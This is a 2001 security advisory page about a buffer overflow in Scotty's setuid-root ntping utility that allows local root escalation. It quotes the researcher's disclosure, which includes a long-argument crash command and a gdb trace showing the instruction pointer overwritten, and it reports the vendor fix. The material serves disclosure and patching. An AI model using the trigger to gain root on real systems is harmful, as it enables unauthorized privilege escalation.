SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Scotty Vendors:   [Multiple Authors/Vendors]
Scotty Tcl Interpreter's ntping Utility Lets Local Users Obtain Root Privileges
SecurityTracker Alert ID:  1001770
SecurityTracker URL:  http://securitytracker.com/id/1001770
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 17 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 2.1.11
Description:   A vulnerability has been discovered in Scotty, a Tcl interpreter for network management applications. The security hole exists in the ntping utiltiy and allows local users to execute arbitrary code and gain root level privileges on the host.

The following command will reportedly trigger the buffer overflow vulnerability:

[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

Because ntping is installed with set user id and set group id 'root' privileges, this buffer overflow can allow a local user to execute code with an effective user id of 'root'.

Impact:   A local user can execute arbitrary code and gain root level privileges on the host.
Solution:   The vendor has released a fix (scotty 2.1.11).
Vendor URL:  wwwhome.cs.utwente.nl/~schoenw/scotty/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(SuSE Issues Fix) Scotty Tcl Interpreter's ntping Utility Lets Local Users Obtain Root Privileges
The vendor has released a fix.



 Source Message Contents

Subject:  suid scotty (ntping) overflow



 I am not sure that this made it on to the list the first time I sent 
 it... so sorry 
 if this is a duplicate 

 [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'` 
 Segmentation fault (core dumped) 

 Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/ 

 What led me to research this: 
 arndt@aorta.tat.physik.uni-tuebingen.de (Michael Arndt) wrote: 
 > i run scotty-testsuite: what must i change on my system:(Linux 
 > slackware): 
 > ==== Test generated error: 
 > can not connect straps socket: Permission denied 
 straps and ntping must be installed suid root. 

 ^------- Hrmm I sure thought that was interesting to know *grin* 

 Vendors affected: 
 unknown by the author of this document 

 just a note I found however... 

 <19990702221232.79B119410@Galois.suse.de> 
 Hi folks, 
 here is the long promised posting of all suid/sgid files on a alpha of 
 SuSE 
 Linux 6.2 ... comments on wrong permissions are welcome. 
 Please note that SuSE has got 5 full CD-Roms so thats the reason for
the 
 many many files ... (and too much suid/sgid ones ...) 
 ... 
 -rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping 
 -rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps 
 ... 

 [root@linux d0tslash]# gdb /usr/bin/ntping core 
 GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 
 This GDB was configured as "i386-mandrake-linux"... 
 (no debugging symbols found)... 
 Core was generated by 

`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. 

 Program terminated with signal 11, Segmentation fault. 
 Reading symbols from /lib/libnsl.so.1...(no debugging symbols 
 found)...done. 
 Loaded symbols for /lib/libnsl.so.1 
 Reading symbols from /lib/libresolv.so.2...(no debugging symbols 
 found)...done. 
 Loaded symbols for /lib/libresolv.so.2 
 Reading symbols from /lib/libc.so.6...(no debugging symbols 
 found)...done. 
 Loaded symbols for /lib/libc.so.6 
 Reading symbols from /lib/ld-linux.so.2...done. 
 Loaded symbols for /lib/ld-linux.so.2 
 Reading symbols from /lib/libnss_files.so.2...done. 
 Loaded symbols for /lib/libnss_files.so.2 
 #0 0x40079b66 in getenv () from /lib/libc.so.6 
 (gdb) bt 
 #0 0x40079b66 in getenv () from /lib/libc.so.6 
 #1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6 
 #2 0x4013b9de in __res_ninit () from /lib/libc.so.6 
 #3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6 
 #4 0x4013ff5f in gethostbyname () from /lib/libc.so.6 
 #5 0x080495b8 in _start () 
 #6 0x41414141 in ?? () 
 Cannot access memory at address 0x41414141 

 -KF


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC